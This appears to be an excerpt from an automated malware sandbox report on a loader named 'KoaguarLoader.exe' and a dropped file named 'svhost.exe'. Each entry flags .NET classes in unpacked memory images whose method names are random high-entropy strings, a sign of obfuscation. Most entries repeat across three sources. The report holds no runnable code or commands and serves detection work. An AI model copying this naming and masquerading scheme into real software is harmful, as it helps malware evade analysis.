                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csHigh entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.csHigh entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csHigh entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, E1KFEgHGhH0nvji.csHigh entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.csHigh entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.csHigh entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.csHigh entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, PdOOlX6Rtzqfchw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, s06KECHfaqSu2R0.csHigh entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csHigh entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.csHigh entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csHigh entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, E1KFEgHGhH0nvji.csHigh entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.csHigh entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.csHigh entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
                        Source: svhost.exe.3.dr, 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.csHigh entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: svhost.exe.3.dr, PdOOlX6Rtzqfchw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: svhost.exe.3.dr, s06KECHfaqSu2R0.csHigh entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
                        Source: svhost.exe.3.dr, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csHigh entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: svhost.exe.3.dr, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.csHigh entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: svhost.exe.3.dr, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csHigh entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: svhost.exe.3.dr, E1KFEgHGhH0nvji.csHigh entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
                        Source: svhost.exe.3.dr, mz0y4kDiZLBo1CD8kctviln15Mlav4wWqkiophhSIbAY36tFYR0bzy8aUlhtkDGzMWh01GiNohDriTCeHcUR7oD895.csHigh entropy of concatenated method names: 'HQ4SmufoVeTWvZHMPWE38mJowv0ZqhbBlrHxpGKre8MaENZhXGPam4eUnAeh6qTIBsQvF8YXFwVKjbOJqfuStF4j3D', 'whVwF84cdhqhBlK13F', 'm3GXfGHyogcdXOobmt', 'EK9XryzRcF6AbqBZyj', '_0JFxjjsypx5pg0r4LV'
                        Source: svhost.exe.3.dr, HinmvclvjMV04j4LsLs1R5hhpSJTYBZXnfPuNv9c1JrEyOq6sBV7oTZLjwr6e3IVUwGiigOYcN1IBjL3qkE4kJlIBN.csHigh entropy of concatenated method names: 'TvTk9crAf1vPq1l7tQNMAajN5dO0BIlajnUfjWF1DTfGzmKVVDDW5UCVsc6RbnHgFe0iTKM23LIT7YrIvJGJXjw8fx', '_3WyUne7TIopD6ctftiAb0vgov9HIVn28hXSFdP20sdCpetye5cBMasORZyxCL0rPac8gwCj4wOcQr6OFRWPQIoBpVy', '_4NZOm9t2GJDzuWgo6xRGWdGRCZPx4sw3xsdWbBBEoXF3sRhNLJDMr3j95ioDf4N94fY9fgRv1jhU9opxdZrvA6SJ2Z', '_9qnsjnbHjKKlcUXfAmx6duO7YflZEhnW7at5574mDd3EaQWlechuF1Zhib2dFBnN21fPkclHWtlPfbJWLp1sVKMyrM', 'u6NcUUD2Va1J0dw4jw', 'XOFS6ORvGscpqc8H7d', '_5E61Grpyt0KrY78W70', 'fnmyZe45FG1ll8J6cS', 'GbnyL2c95RcwyGfI3Z', 'Uj9Jfu4uXIR6ZbaK5l'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, 6qLYWbyFK6qWQKW2MkuPmQFT7Q4f9DhTx.csHigh entropy of concatenated method names: 'HB0nHcvGHllU4fCudgsk0k5ZhPL9hVYfa', '_5XpEUURxN68BPDK5cYXoCmenv4tTHtJiP', 'PnTalNGqESallzXuVY3xXhj4eqoXY8ga5', 'VD4a4FMbUq9YEJkvqd', 'opi6fbn7AE78VCKqxA', 'bBZMODwHlaHkIiWoam', 'AVvY9jqnmfbupsLVTQ', 'oRTqijffP2WzGVKQqf', 'orkPLEyg6SvYd8aeqW', 'dQpf4cbfjFubfl3NwQ'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, PdOOlX6Rtzqfchw.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'eN1JIA4zkAsyaD3pChMi7bNrCU0D3oAyM', 'PwozvAvmtdvBFx7DfOHXokWB2K3FjRf3M', 'dB7yd4xFQG5ZOsSIZP3r7VleYmmVHCurV', 'K74BrBicfZZMTVgjVoH9fY6gXgPKuWCYD'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, s06KECHfaqSu2R0.csHigh entropy of concatenated method names: '_34b6HPpANa7f2zU', 'rlYSW350KSm2Q0n', 'yVdEWbztAmDtwEl', 'NBS38W4O4iwGD7s', 'UGjk0iU36mOFVBw', '_1sNuZOq7sZwBeWe', 'MujzZRRDu6Pyvkr', 'PYDx4z2YfoJ6lo3', '_9cc9fPDukijRsg4', 'txWqTebWeGSxBXP'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, fi3dLWM85Cwqr1XweZ7s4rYELevHzU9bxVONnO5Gl7HCKWMRLgGxlEA8udoz3pZz0ygKZKnD8W7NViXCNXuJ3kIdDp.csHigh entropy of concatenated method names: 'MyRTOcwgUCRfktTKscSpaYX6Lyxe2mBLXGefeLVy8lz0FbZGsqHmrldQyUHRjvSNJaVLWd8C0xkN5Xdv2xNpZSbxRf', 'McffwUCOjGH47WJcEYTNRVPJmjPaIjMsaKwEChB4c7ot30A1MXxkMnm5jSeYjcJV17CmH8Q9lXn1KWnvbfdgM1MziC', 'zAVqEGWPmkpBqWfqUeBXC3tQykKLbyYq3cKKWGumgTHv5bQm63HG8dAxTL4X0BCTgE6ivtlqwiFyFpmzPQnWi8shgP', 'BpHf1DAMnZq95CUrTmp6juTrJ8sB0Q4NfNYERbgJS51QWCEMydJZnpj8erlyyA74JXPOxhjd2Fa0DfPgtMEn30DP5R', '_1RSde5xnPX0XHMyWsWixoUbZNDTyTIcthJu4hmvJmlN0tbPCeENgUnWmQvmqqYrNydi5V0AxPpVxUrelBe3DpiBzke', 'F0JXH0FVkdQ4JpNOMccvuHVYoyZQi07XTpoFsycGwTgGjHxYjA27baNMKyEPWd0rzsx5AIOdPF3iYsHHtgbXhJGgtH', 'd09DcodNNmAtQwMlWk5K5fBAnVBVFkbbhVq9o2RFraOFTIfJEYfQuikgNdKIDON7rR9JEIwJ3ZNBRV8jQG8D0Pdjba', 'Wt1d6KQipyyiGN38BwnbzG2xtm3CHo6h8AejhyrNXVmdy4J8AjuZ2og9jk10mT7uiBC5vaVHO9YnWSRnx2dEPmxvtl', 'PNhDheFVbxndP8C7m7wFOrJvbDMVHbV0m', 'o0YX5c1UV2izzFDIOA0C9ixOXrFL0CMP6'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, sant3NY92c40ENnlYSatx2hRMG2JhHq9WHEaO1LJ0S1nvWgbV32QGClVQu1AYeGkW1GTLQp9nB4R7pi84wKH1d331N.csHigh entropy of concatenated method names: 'fjxx7Cpj8t98HOaueHyLKAhPbi19PhKTWdATPwXCVr5OLA9RVVxQdIJWNWAJLJA9bC7EUaMAKY7luliYJOLJRTJzZH', '_7tKMGb6lJn2k5bzhno1pNQO4s20ODbuIR4JXEcwCZGtlA8vCTvm7OEg7atqva2Qho9Sya04sMZPwEyEB9jlVBlLa37', 'QRGhygyziTFu3beTyypXV5wTeLw87CaoHdxecadIXu3h8UdUh9ulNOFahen8LhsimbOzJj36mKC5lySfVwtD10PQSK', 'gEjyH3vv3xbtNs0ORNHQS7apurMB0PQnOYAepnMEu9RgWL9JmkgcR1sTakxCVrtsKazblpXR88Dyv8uRu1xqSwSZNc', 'uoMpudYCrZJRhsDbx6FNCAx7rd7ToTpD4qbsS5RLbhLYNi2rjobxWl2mNZlVkp9g0zeaEVrtd3bHhW56CgJytTDHlP', '_5Tt4brxHmaF93KJJZg97WrB1MtIBjnqJfrUhVtrX5q9T0kR8gKMV67HcgL2mQNQxRM06ramWMgxbtapzmLaxgD4cy4', 'ydG9SWBXC4D5TX8jN1WwgXulK8tV0MInhRUaEfMwNj3z7SvC4FaIOiuq9FQclGGqoGOnZaYEPyqSmF7ZACt0RVOkBJ', 'DOP1CPrIOR00iOFDLuXOt2WiPwXSQUka8Cvf1OnPI2tVRVpXR6lgUu62lbZZlKLZK2gQLrR1c4OTx0Z3Io3c65ykQx', 'BKbJQzlvGCRJVie80MjWIQMsoJ2UPufRtAm5UMrMjsQInxc4LdrIkifxu21e4kNzBlifSdVfMZEUFROuGeCqSYbmeZ', 'tVamnSKuv7DQDmBf0g3k5GgvGYHwfb9NYMSiVV68N4pKfQ0yyvxu4q74OP5GtPhGPCWZJ5KkBLc2R6ssA7Axyu3sya'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, j7CxY8VJCXsgfpfgNGwki0Ktagndhv4AVokBnp0OSdwntgf4x7CcSfyRWLsuXe230GnCbdTRJkgG551k64zmGnt6pb.csHigh entropy of concatenated method names: 'LKxV98wGAo9eL17wRpFLaJ0yq5mplxT6qMTLzFxHpU8MP4iZBXyLftjugZVyX3QQQuBAKpOuNLW534Nk0QbjTylPdz', 'Y5mpNauWmEfU6zZjkV', 'k1q8l88CNNExpjrDUw', 'Zn24Kc7qAgwHXlZ2eQ', 'eYa0ZIJwm9KIm08HDa'
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, E1KFEgHGhH0nvji.csHigh entropy of concatenated method names: 'iQOT3b8MMl29teM', 'b0UvRFf299vpih6', 'DI3hWbTayjELyGq', 'aeY9HYWEiD0FnoN', 'UpwMJwgy7qjCIeH', 'ZquDJCBOV1tLZiD', 'cy2bv1MdT0k1gL5', 'ltfFYDooW1soJs6', 'EWbk2tBnAb6wrvn', 'xITER9TKup2p1wk'
